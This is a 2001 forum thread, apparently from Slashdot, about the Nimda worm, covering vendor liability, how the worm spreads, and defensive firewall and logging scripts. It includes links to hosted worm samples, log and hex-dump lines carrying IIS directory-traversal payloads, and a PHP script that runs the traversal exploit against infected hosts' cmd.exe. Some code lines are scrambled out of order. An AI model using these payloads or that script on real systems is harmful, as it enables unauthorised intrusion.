Again, an unintended consequence of HTML e-mail. But I think it's unreasonable to say words to the effect of "Microsoft should have known that people would be able to track me by supporting HTML e-mail". Microsoft wasn't even the first to support it ... they used RTF in the beginning, but everyone else used HTML (for obvious reasons, since it's a standard).
And you cannot turn off HTML fetching from your e-mail or have it ask you first.
Again, untrue. At least since Outlook 2000 (which I run), you can adjust security settings for HTML e-mail, or HTML anything else for that matter. It's actually very flexible.
These are all examples of gross security flaws that Microsoft has created.
I don't necessarily disagree that Microsoft could do more, but it's also unreasonable to imply that they've done nothing, or that we should go back to being green screen luddites. This is going to be a learning process like anything else.
Sometimes it's best to just let stupid people be stupid.
Here at our office of CalTrans (the calif. dept of transportation), almost all of our machines are having the same problem: None of the Office 2000 applications will run. They sit for about 5 minutes in the background, taking up 2mb of ram and 0% of the cpu, and then start... and give strange errors about corrupted files when you try to open something.
Related? My pc right here works fine, but it seems almost everyone else can't use office 2000.
using namespace slashdot;
troll::post();
Deception to profit at other's expense is fraud, a criminal offense most places.
It's sitting at http://www.initialized.org/virus/readme.eml if anyone wants to take a peak at it...
*DO NOT OPEN IT IN INTERNET EXPLORER.*
Do you like German cars?
With the latest version, the window doesnt even start up at all if you have popup-suppresion enabled :)
An interesting question of responsiblity arises. I should point out that, with a few egregious exceptions, Microsoft does proved patches for security holes. It's just that the network admins don't apply them. However, there wouldn't be any need for security if there weren't 31337 skr1p7 k1dd13z trying to bring wed sites down for kicks.
Three parties are involved in this mess. There's the dubious software vendor, Microsoft, who has written the programs with these gaping security holes. In addition, the end users that use the horrible products also bear responsiblity. Last, but not least, the 31337 d00dz that wrote the programs to exploit the holes in Microsoft's programs. First let us consider ourselves -- is there an element of responsiblity that we owe to the world to check whom we trust with our equipment? Yes, and I'm proud to say that I'm doing my part by using Mozilla and KMail and other GPLed whatnot. Everyone's favorite scapegoat, Microsoft, does not deserve as much blame as people like to place on their shoulders. Everyone should know better than to depend on something written by as sloppy a programming house as Microsoft. That doesn't excuse them from their part of the responsibility: if they had been more careful, worms like this couldn't exist. However, the brunt of the blame falls on the 31337 d00d that wrote the worm. If the 31337 d00d had never written the worm, we wouldn't have to worry about this. In fact, blame can only be assigned to the first two parties because of the inevitability of the existence of 31337 h4x0rz. Simply put, although we all share blame for worms like this, it is the direct fault of the d00d that put this worm into existance.
Join the Slashcott! Stay away entirely Feb 10 thru Feb 17! Close all tabs to prevent autorefresh!
127.x.x.x is LOOPBACK.
Class A is from 1-126. Class B starts at 128.
Guess you gotta take "Networking and Operating System Essentials" again, huh? ;-)
Also, the default Subnet Mask for Class A is 255.0.0.0
The Masked MCSE
"Oh fsck, here comes another worm!"
I think you fail to miss something.
:-P
Yes, Ford was liable for those incident which occured out of nowhere.
However, what if Ford had realized "Oops. There was an accident in the plant, and these tires may not work.", issues a recall, makes is super-easy to get the tires repaired...
6 months pass, and tires start to blow out. Even though Ford has made it incredibly easy for anyone to prevent it from happening to them.
Let's take it up a notch. Let's say that the bad tires were only on commerical vehicles. (As IIS is only only Windows Servers, and Win2K *as an installable optiont* (not by default)) It is more the fault of the people whos job it is to keep up on car part recalls and prevent accidents from happening... Perhaps in the first month or two, it would be in question. But, if the mechanics wait *6 months* to fix a high-profile recall, the blame starts to fall more on their shoulders than anything else.
And, as dramatic as you make it sound..nobody's died because of code red--last time I checked, at least.
-Jayde
What's a sig?
at least on the @Home network Code Red is still alive and well check out this log file. it's not auto-updated i just catted it at about 5pm central time on 9-18-01... yup thats right mostly TODAY i've managed to rack up a 5599 line file.
sig
Can I Get A Witness! Amen Brotha'!
I'm sure the people in Afghanistan can afford l33t computers to h@x0r americans on their $4yr annual wage.
Some people are so freaking stupid, I'm repulsed.
It's at http://www.initialized.org/virus/readme.exe .. Just remember not to run it on Windows. :)
Do you like German cars?
I was just forwarded the following as info on removing this bad boy. I've read a lot about people rebooting and losing the box, so looks like a bit more planning then that is needed.
:View All Files. (this includes the hidden files)
Anyway, I havn't verified this works but here's how one person claims to have removed the beast:
the last several hours of removing this baby from the whole office, here
are the steps---
set up the computer to
Find: *.EML DELETE ALL of these Outlook Express email files. The
filenames come from files that have been accessed. You'll find EML files
in your startup, system tray, start menu, etc. just search all local and
network drives. A single computer can have 400 to 3000 of these files
Find: *.NWS DELETE ALL of these newsgroup files. About 20 or so.
Find: riched20.dll DELETE ALL that have todays date. This will leave
only one. If you delete all of them, you need a good one in
/windows/system. Go find on another computer.
Run: SYSEDIT, edit the c:\windows\system.ini file and modify the
SHELL=EXPLORER.EXE to read just that. Take out the load.exe -noloadold
(or something like that).
Find: load.exe and delete this bad boy. If inuse by Windows, you need to
reboot.
if your computer comes up with "modifying system files" on a reboot, the
load.exe is still being executed. Repeat the above steps (but you won't
find the SHELL=EXPLORER corruption).
Never trust an atom. They make up everything.
Can someone check if the client will follow redirects ? I yes, I suggest to make Redirect /scripts , /c/ and /d/
rules to http://www.microsoft.com for
In itself that should be a good punition.
Daniel
<VirtualHost 24.222.rest.ofyourip>
ServerName 24.222.rest.ofyour.ip
ErrorLog
CustomLog
</VirtualHost>
I like ice cream.
They talk about "security features", but I don't see the claims you are talking about. Tell me the quote.
There is not a single quote saying "this product is 100% secure." The clear and obvious purpose of the web page is to leave the user with the impression that the IIS product is secure.
At least since Outlook 2000 (which I run), you can adjust security settings for HTML e-mail, or HTML anything else for that matter. It's actually very flexible.
Then tell me how to prevent it from fetching items from the web -- i.e., no permission for Outlook to access data via HTTP. Then I might switch from Outlook Express 6 -- the most current version of Outlook Express and what I run.
Outlook gives you all sort of warning bells and whistles for a long time now.
You are correct that the newer versions do give warnings. I stand corrected.
The best site to track this incident IMO (incidents.org) now has a pretty good picture of what's going on from a technical perspective.
A short summary:
The Nimda worm is now known to propogate four ways:
(1) An IIS vulnerability propagation mechanism where the worm attempts to exploit a large number of IIS vulnerabilities to gain control of a victim IIS server. Once in control, the worm uses tftp to fetch its code in a file called Admin.dll from the attacking server.
(2) Email propogation. The worm harvests email addresses from the address book and potentially the web browser history and sends itself to all addresses as an attachment called readme.exe. These executables are automatically executed if the receipient who opens (or previews) the email is running Internet Explorer 5 or 6. Note that the worm may spoof the source address on the emails.
(3) When a web server is infected, the worm replaces all web pages on the server with a binary encoded as a wav file, which can infect each client that connects to the server. The wav file is called readme.eml. Microsoft Internet Explorer 5.0 and higher will automatically execute the malicious file.
(4) The worm is network aware and propagates via open shares. It will propagate to shares that are accessible to username guest with no password.
See: www.incidents.org/react/nimda.php for the full details.
- YASP (Yet Another Security Professional) who is fighting this pretty heavily at work - nothing here infected, of course, but the traffic itself is threatening to become a pretty nice distributed DOS - our Internet Router (a decently-hefty CSCO 6500-series) is sitting at ~60% processor utilization.
---------
There is no try at jedinite.com
aye.
i also cannot reach my 24.20.xx.xx @home machine.
they really oughta shut down the fuckers that cannot patch thier system.
(pretend there's something witty here)
No, actually a lot of cat owners keep a dog around, too.
The dog's job is to keep the litter box clean.
Smart animals, those dogs...
Microsoft Software is more popular and so it gets hit more. If linux was just as popular you would see the same thing happen.
You wish. The MSFT-toadying media thought that x.c , a FreeBSD and Linux worm, was going to be the "Next Code Red". My machine got more hits from sadmind/IIS worm (Solaris) than x.c. C'mon, shill-boy, why aren't you toeing the Wagg-Ed line? The truth of the matter lies more in the fact that Windows is more-or-less a software and hardware monoculture. Any flaw in IIS affects *all* of the population. The Linux/Unix/BSD/Solaris population has much greater diversity: a flaw in the WN web server isn't going to affect sites using thttpd. Similarly, there are dozens of Linux email clients in use, from mailx to Pine to mh. I don't think there's a common scripting language amongst the diversity of Linux email clients, and I don't think *any* of them are dopey enough to execute "readme.eml" files.
People that dislike windows and love linux are the reason for this attack. Its these people that are writing the viruses and worms. You've got to be kidding, right? Have you got any evidence whatsoever to back that up?
Email is going out with spoofed headers from multiple sources (e.g. incidents.org reports receiving one from webmaster@incidents.org), so I doubt WinZip was actually hit.
We are the Music Makers, and We are the Dreamers of Dreams...
No. Users were negligent in purchasing and deploying software that was already known ahead of time, to be defective.
Microsoft's reputation is well established. Ignorance is no excuse.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
Do you really want to establish a precedence that sez all software developers are libel for the worms others create?
No. I want to establish a precedent that makes software publishers responsible for making their products work as described and proactively notifying users of patches necessitated for security reasons.
I'm guessing you don't write much code.
You guessed wrong. I've been a professional software developer since 1980 -- back when Microsoft's only products were languages like BASIC, Fortran, and Cobol for 8-bit CP/M systems. Now I develop embedded systems -- currently for satellites. If my code causes a mission failure, I expect to be unemployed. So I don't have a lot of sympathy for Microsoft when they pretend that it is impossible to write robust, secure software.
My server has been flooded with this crap... Thank god for comprehensive server logs and even more comprehensive service packs - curious: have there ever been any mass infections/security problems like this for Unix/Linux? I'm not asking to be a troll or anything I'm just curious about the focus of these attacks...
The clear and obvious purpose of the web page is to leave the user with the impression that the IIS product is secure.
It's a marketing page! The "clear and obvious purpose" is to tell you the features of the product in hopes that you'll buy it. I'm not sure how it should be changed to satisfy you.
Then tell me how to prevent it from fetching items from the web -- i.e., no permission for Outlook to access data via HTTP.
Hmm. There are a whole slew of options (you basically create a custom zone, and then tell Outlook to use that zone), but I don't see one for "deny downloading images" or something like that. I'm only running IE 5.0. The IE 5.5 renderer might have some additional security options.
Heck, it's not a bad idea. Submit it to Microsoft and it will probably be implemented. One thing you have to give Microsoft credit for is responding to feature requests (although many decry this as "bloat").
Sometimes it's best to just let stupid people be stupid.
So far, in the past hour, i've been hit around 2000 times. (I know that may not sound like much to some of you getting 20 hits/second..but bear with me here..) in coontrast, CodeRed only hit me 200 times an hour, at peak
It also spreads in more ways then any other worm i've ever heard of. [The number of hits is going up, as i type this] this could be a very, very wide spread worm. I just hope M$ doesnt put a PR spin on it saying how they saved the internet..bastards...
Could this be the start of better software being used?
Probly not. People seem to accept that every few weeks some "evil hacker" will come and f*ck everything over. If only we had the same views on cyberterrosim as we do on "Real Life" terrorisim
Will this mark the start of worse worms/viruses/viri?
Yeah. This thing is spreading like wildfire, due to the fact that insted of copying ONE worm like is often done, this worm has many, many exploits, and many ways to spread
The opinions in this post are ficticious. Any similarity to actual opinions, real or imagined, is purely coincidental.
Two servers I take care of have had 3000 and 4000 hits, respectively, today -- and the one w/4000 is just a lil' 486 w/16mb of ram. Go selenium go!
Carousel is a lie!
Like everybody else, I'm seeing ferocious numbers of http attempts at my firewall, so I took a look at some of the originating IPs. I've only managed to get through to a couple of them, since the worm appears to keep the victims fairly busy :)
Having pulled down a couple of the readme.eml files from the infected boxen (mmm... Mozilla on Solaris on Sparc :), I noticed that they are not all the same. Suppose the folks behind this one realized that a monoculture is a Bad Idea, or is it likely harvesting some data while it propagates?
I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"
/* Check to see if the connection actually opened */
/* URL-encode the message... */
/* ...and send it */
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n");
/* close the connection (though it probably got closed automatically) */
/usr/local/apache/httpd.conf, whatever it is) and put this type in like this:
.php .php3 .exe
/tmp/nimba.log.
<?php
/* Open a connection to the offender */
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
if ($fp)
{
$string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
fputs ($fp, "GET
fclose ($fp);
}
/* for fun and confusion.. */
header ("HTTP/1.0 404");
echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" );
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL $SCRIPT_NAME was not found on this server.\n");
echo ("</body></html>\n");
echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
echo ("</body></html>\n");
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>
Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?
Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf,
AddType application/x-httpd-php
That should do it, and you're going to have a logfile of all the people who have been warned in
Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.
Got hit with a bunch of emails from some person I don't know with an attachment, no subject. I was checking through telnet to a UNIX server, so I just killed the files without much thought. A later telnet into the same system popped up a message that my university's off campus connection to the internet was bogged down by this Nimda worm. Traffic to the outside has been slow to nonexistant all day. I checked the dropbox I keep for my shared files, and sure enough there was a .eml file waiting for me. That got deleted, and the folder closed to outside access. I should know better than to allow guest write access, even to one directory. The rest of this system's pretty well locked down, and several manual scans show no sign of infection. This thing's so new there's still no information on how to remove it if you're infected in Symantec's database. They have, however, documented it's behavior, you can see it at Symantec's Page.
ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too.
Why stop there? The end users are being hurt by the ISPs. The ISPs should be catching these exploits and shutting down traffic from those servers. And the end users' dogs are being hurt by the end users. When I spend more time on the internet, I have less time to feed my dog. Not to mention that when I don't feed my dog my dog sometimes goes out and bites my next door neighbor. And that in turn causes her to call 911. And when 911 is busy people die. Every one of those people should be suing Microsoft, damnit.
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
This seems like just the kind of thing I'd do if I had too much time on my hands. Webmasters everywhere are sick of seeing their logs get filled up with shit related to this, and everyone seems to be ignoring that these things still exist, only because old news seems dull.
So how do you combat this? create awareness? force people to know?
Well you could make something like Code Red, but then people would just ignore it a week later..
The problem with Code Red was that it was Over-Hyped, and Hyped incorrectly.
Saw 'experts' on the news saying that the virus could be removed by rebooting. Result: A lot of people rebooted, nothing changed. Even if a lot of people actually installed the patch, it doesnt help at all that the solution given by many people to any problem is to completely reinstall whatever the effected programs are. Even I do that to individual programs. I even did that in Linux yesterday (I usually dont take any of my windows policies over to linux)
So how do you FORCE people to listen? I mean even if you make people listen to one problem, they may not hear about another one, so if Code Red is gone you can still find people hitting you with whatever else they had before. And they're both still out there.
So why not create something that is not at all stealthy, not fast, not anything at all to make people not see it, just completely in-your-face and seeming to serve no purpose other than to be in-your-face.
As I type this, my tailed log has scrolled more than code red ever did on its worst day. I think this will get someones attention. If you thought Code Red II was annoying still appearing in your log every now and then, well you won't as easily be able to ignore when just one of these things tries to connect.
-- 'The' Lord and Master Bitman On High, Master Of All
You're talking with your buddies, and you mention you're thinking of making your move with Jane.
"Are you nuts?" says Bill, "Jane gave me crabs."
"Crabs? I wish I just got crabs. She gave me AIDS." says Tom.
"Yeah, she gave me AIDS too," says Jeff.
"She gave me Herpes," says Joe.
"She didn't give me anything. But I used seven condoms," says Fred.
"She gave me AIDS and Herpes and crabs," says Ted.
"You poor bastard," everyone agrees.
You think it over. Maybe Jane's not worth it. But she meets your gaze from across the room, and the pattern of scabs on her faces changes in such a way that you think she might have just smiled at you. "Oh what the hell," you decide.
A couple of weeks later, the doc gives you the bad news. You're infected, and you got it from Jane.
Now here's the question: Is it reasonable to sue Jane? What were your expectations? Well, the same goes for NT users. NT users many years ago had a reasonable expectation of security, just like the first few guys who shared Jane had a reasonable expectation of not getting an STD. But expectations change over time. They are shaped by experience, reputation, word on the street, and the sound that cockroaches make as they scatter before a light. If your expectations do not change to fit the available data, then the only thing you're a victim of, is your own stupidity.
There's a nimda.com. It says "Like my new virus?"!
It's registered to a Ron Nimda!
Don't expect its a real name.
I agree with this statement. Read your sentence again :-P
as dramatic as you make it sound..nobody's died because of code red--last time I checked, at least
Good point and I agree with this statement too :)
I'm not going to defend my tyre spoof as anything like a direct analogy - I was trying to make a wider point about liability. Why is it that, seemingly uniquely, the software industry bears no liability for its products? I don't use MS products so I'm not bound at all by their (legally untested) shrinkwrap agreements and EULAs. Yet, this incident is just the latest that has cost me money. Bandwidth ain't free you know and this sucker has wasted an obscene amount of it.
Even given the lack of liability, where has the public awareness campaign been? There has been no "recall" of any kind. Seen any ads in the last few months advising users to make sure they are patched? If there have been any, they've been drowned out by XP promotions. Or directed at sys admins, because there seems to be a belief that this kind of thing only affects web server operators. Even you make this mistake ("(As IIS is only only Windows Servers, and Win2K *as an installable optiont* (not by default)"). Wrong! Many many components in a Window system (server or desktop, makes no difference) do install IIS. It's a fight to NOT install IIS.
And even regardless of this, nimda is not restricted to servers - many of the infections are users' desktops. Have MS done anything to alert Joe User about the need to patch? If they have done anything, it's way too little too late. That to me is a lack of diligence. It's negligent to the point of recklessness. And that's my point - all other industries get whacked in the courts for reckless negligence, they are liable for the products they produce. Why is software a special case? I don't think it should be and the call for a class action suit in an earlier thread is entirely appropriate.
I send this to web sites that I can spot using my apache access log. I tell them they're infected. :)
a .a @mm.html
To Webmaster:
Your web server is infected with W32.Nimda.A@mm. It continuely sends invalid GET requests to my web server. Please take action.
http://www.sarc.com/avcenter/venc/data/w32.nimd
I recommend you to switch from your Microsoft Web Server and use a free, and more secure server such as Apache. http://www.apache.org/
Thank you
When someone chooses NT for a server, there's only three possible things that can be on their mind:
So, IIS WebMasters, which category are you in?
I've been looking up IPs listed in my logs -- just curious to know who's infected -- and guess what I found:
64.121.170.4
Look it up for a good time...
Visit sunny Knowumsayin.com, home of the pork shirt.
The Cisco 675 I use for DSL access was acting sluggish/nearly dead this morning, just like it did a few weeks ago when Code Red was going around. Are there any reports of Nimda causing this kind of thing?
That that is is that that that that is not is not.
A few small fixes, but mainly this puts everything on a second chain, so that only incoming HTTP requests will have to go through hundreds of ipchains rules.
/var/log/httpd/error_log* | awk '{print $8}' | sed -e 's/]//' | sort | uniq`; do
#!/bin/sh
if [ ! "`ipchains -n -L block80`" ]
then ipchains -N block80
fi
if [ ! "`ipchains -L input | grep block80`" ]
then ipchains -A input -p tcp --syn -d 0/0 80 -j block80
fi
for LUSER in `egrep "winnt|default\.ida"
if [ ! "`ipchains -L -n | grep $LUSER`" ]
then ipchains -A block80 -s $LUSER -d 0/0 -j DENY
echo "Blocking $LUSER"
fi
done
Something odd... after being infected for several hours, some of the machines have started to lose network connectivity. Hmm...
When you report a problem with one of their products to MS, they don't care if all it creates is a crash (I guess this is not surprising really, given the general level of stability of their OSs). They absolutely refuse, as a matter of policy, to do anything unless you can provide proof of exploitability. How negligent is that?
I found on one of the cracked servers a page that contained this address:
iiswish@microsoft.com
Its so you can email them with comments or suggestions... you all know what to do...
--
"Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]
Comment removed based on user account deletion
THIS message takes extremes and make broad generalzations and giant leaps of logic. Sure it is flawed, but no more flawed then what the goverenment is trying to do wrt encryption.
This is a IIS and IE virus/worm. There is one company that keeps releasing shotty software that is vulnerable. This time it is being used by 'bad guys' (where bad guys are people who are flooding the net w/ their crap).
Well, I believe the government is trying to outlaw encryption because the bad guys use it. So will they outlaw IE and IIS since bad guys are using it to 'damage' the internet?
I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav. /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249
.......|
<BR><BR><BR>after hexadecimal dump, i've noticed this string :
<BR><BR>
<BR><BR>"Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"
<BR><BR>in the code i can found :
<BR><BR><BR>00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255|
<BR><BR><BR>00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..|
<BR><BR><BR>00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi|
<BR><BR><BR>00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2|
<BR><BR><BR>_vti_bin and _mem_bin are part of my apache access logs :
<BR><BR><BR>213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET
<BR><BR><BR>major part of the mail can be found in the hex dump as :
<BR><BR><BR>000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....|
<BR><BR><BR>000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |.|
<BR><BR><BR>000092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.....--|
<BR><BR><BR>which is the code of the html part of the mail,
<BR><BR><BR>or :
<BR><BR><BR>00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co|
<BR><BR><BR>00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi|
<BR><BR><BR>00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=|
<BR><BR><BR>00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co|
<BR><BR><BR>00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E|
<BR><BR><BR>000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.|
<BR><BR><BR>000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID:
<BR><BR><BR>which corresponds to the mail :
<BR><BR><BR>&nbsp; &nbsp; I 3 readme.exe [audio/x-wav, base64, 75K]
<BR><BR><BR>(mutt output)
<BR><BR><BR>I'm not a virus expert, but if somebody is interested by the readme.exe code or more informations, please mail mglcel@gcu-squad.org.
<BR><BR><BR>I've sent a mail to mc-afee support to learn if they know this worm, Concept(CV).
I was digging thru my logs when I found this entry (note the date)...
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af. .%c0%af..%c0%af..%c0%af/winnt/system32/
207.##.###.# - - [02/Apr/2001:03:15:00 -0700] "GET
cmd.exe?/c%20dir HTTP/1.0" 404 329
So it looks like someone was giving this one a dry run several months ago...
Jay (=
Reuven Lerner, the author of Linux Journal's nifty At The Forge column, wrote a really cool Apache module in perl named Apache::CodeRed and available from cpan here. This helped out with my codered hits and made me feel like I might be helping get rid of the stupid thing.
/scripts to Apache::Nimda by adding the lines:
/script>
I modified (search and replace..hehe) Apache::CodeRed by inserting "Nimda" where "CodeRed" had been and put it in perl's @INC. I also had to change the Apache config file to pass requests for
PerlModule Apache::Nimda
<Location
SetHandler perl-script
PerlHandler Apache::Nimda
</Location>
As soon as telocity's mail server comes back up (another nimda victim?) I'll email Mr. Lerner and see if he is interested in making a more general perl Mod to deal with all these annoying exploits. Maybe if the people who admin these rouge boxes got as many emails as I get breakin attempts they'd get on the ball and fix their machines...but I kinda doubt it.
acl umbricus_microsoftius url_regex \.eml$
http_access deny umbricus_microsoftius
Obviously it quite an easy filter to come up with, but I may as well post it for anyone that didn't think of it. Bit easier than reconfiguring 4 gazillion IE boxen and fielding all the calls about websites needing VBS/Javascript not working after you've fixed people's machines.
"A Web Interface for your Windows Explorer"
--- sig moved for great justice.
Wire cutters.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
sorry for the last ugry post, bad manipulation.
/_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 major part of the mail can be found in the hex dump as :
.......| which corresponds to the mail :
I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav.
after hexadecimal dump, i've noticed this string :
000090c0 6e 74 65 72 66 61 63 65 73 00 00 00 43 6f 6e 63 |nterfaces...Conc|
000090d0 65 70 74 20 56 69 72 75 73 28 43 56 29 20 56 2e |ept Virus(CV) V.|
000090e0 35 2c 20 43 6f 70 79 72 69 67 68 74 28 43 29 32 |5, Copyright(C)2|
000090f0 30 30 31 20 20 52 2e 50 2e 43 68 69 6e 61 00 00 |001 R.P.China..|
"Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"
in the code i can found :
00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255| 00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..|
00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi| 00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2|
_vti_bin and _mem_bin are part of my apache access logs :
213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET
000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....|
000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |.| 00092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.....--| which is the code of the html part of the mail,
or :
00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co|
00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi| 00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=| 00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co| 00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E| 000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.| 000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID:
I 3 readme.exe [audio/x-wav, base64, 75K] (mutt output) I'm not a virus expert, but if somebody is interested by the readme.exe code or more informations, please mail mglcel@gcu-squad.org. I've sent a mail to mc-afee support to learn if they know this worm, Concept(CV).
it's better..
A Canadian Company that I am working for was hit this morning by one for those virii. It has a name - the Concept Virus. It seems to propogate itself by finding open IIS servers within the network (in our case, about 30 pc's running Windows 2000 Advanced Server w/ IIS running by defualt) :) It then continues to create it's own versions of the cmd.exe, tftp.exe and admin.dll files for propogation within the network.
I hope this helps some folks out. It appears as though that this virus writes a tonne of tmp files to the inetpub folder, and you can see the executable code inside, as well as the name of the virus itself.
Have fun! I'm gonna go get my mac on!! =:)
God-bless the free world (in particular, Canada!)
C is for cookie... C++ means I get 2... right? Steve "TheWebMan"
I noticed my line going crazy this morning, and after checking the apache logs, saw a bunch of shit. So I wrote these scripts to automatically add the IIS hosts to the ipchains table.
/default.ida')
./sortip.sh | uniq
/var/log/kern.log | gawk '{ print $12; }' | cut -d ':' -f 1 > b.tmp
./sortip.sh | uniq) ;
/var/log/apache/idiots.log formofidiots env=idiots
apache.sh:
#!/bin/sh
ALOG=/var/log/apache/access.log
declare -a PATT=('/winnt/system32/cmd' 'GET\
declare -a SP=('Some\ new\ IIS\ exploit' 'CodeRed\ worm')
#let i=0
# Parse apache log for some new freaking IIS exploit
for sploit in "${PATT[@]}" ;
do
#echo "${SP[$i]}"
cat $ALOG | grep "$sploit" | cut -f 1 -d ' ' |
#((i++))
#echo
done
addrules.sh:#!/bin/sh
IPADDR=`hostname -i`
#grep 'DENY'
# add new chain for http idiots
if [ ! "`ipchains -L | grep 'Chain web'`" ]
then ipchains -N web
fi
# go through the list of idiots, adding a rule to DENY all packs to port 80
for ip in $(./apache.sh |
do
if [ ! "`ipchains -L -n | grep '$sploit'`" ]
then ipchains -v -A web -p TCP -s "$ip"/32 -d $IPADDR www -j DENY
# then echo "$ip"
fi
done
sortip.sh:
#!/bin/sh
sort -t '.' -g -k1,1 -k2,2 -k3,3 -k4,4
If you're running Apache, the following directives will log all the requests to a different file:
# CustomLog with idiot IIS users
SetEnvIf Request_URI "winnt" idiots
SetEnvIf Request_URI "root.exe" idiots
SetEnvIf Request_URI "default.ida" idiots
SetEnvIf Request_URI "c+dir" idiots
LogFormat "%h %t \"%r\"" formofidiots
CustomLog
Hope that helps! The apache logging is based on ideas from another post on here, but the rest is my own. Feel free to modify and share.
Josh
Arghhh!! Just when you thought it was safe to spend the day /.ing, this comes along...
Oh well, off to Symantec.com...
Anyone know if something like this exists for Apache? A tool like this, if widespread, could effectively contain future buffer-overrun type attacks.
No, Thursday's out. How about never - is never good for you?
So who's gonna write a version of the CR/CR2 perl script that Kryptolus wrote? I would like to, but I'm not quite enough of a perl hacker to pull off something worth running on the logs that this worm is generating.
They arent as bad as they were this afternoon (theres at least one green time now), but check out the damage.
Internet Traffic Report
Is there a blacklist of machines infected by worms/virii that generate irritating traffic (e.g. nimda, Code Red)? Something along the lines of ORBS or MAPS... someone detects virus/worm activity coming from a machine and zip, the machine's IP goes into the blacklist and everyone ignores it.
If not, anyone interested in starting such a list?
Nick Tonkin has already written an extension to Apache::CodeRed that notifies administrators of infected hosts of both the CodeRed and Nimda worms. The module requires Apache+mod_perl and is available from here.
Nick's announcement is here and important configuration instructions are here.
Thanks to Nick, Nathan, and all the mod_perl crew for their quick work.
These executables are automatically executed if the receipient who opens (or previews) the email is running Internet Explorer 5 or 6. Note that the worm may spoof the source address on the emails...
.eml or .exe files). Moreover, I'm fairly sure that MS has patches for these vulnerabilities in IE5.
.eml bug.
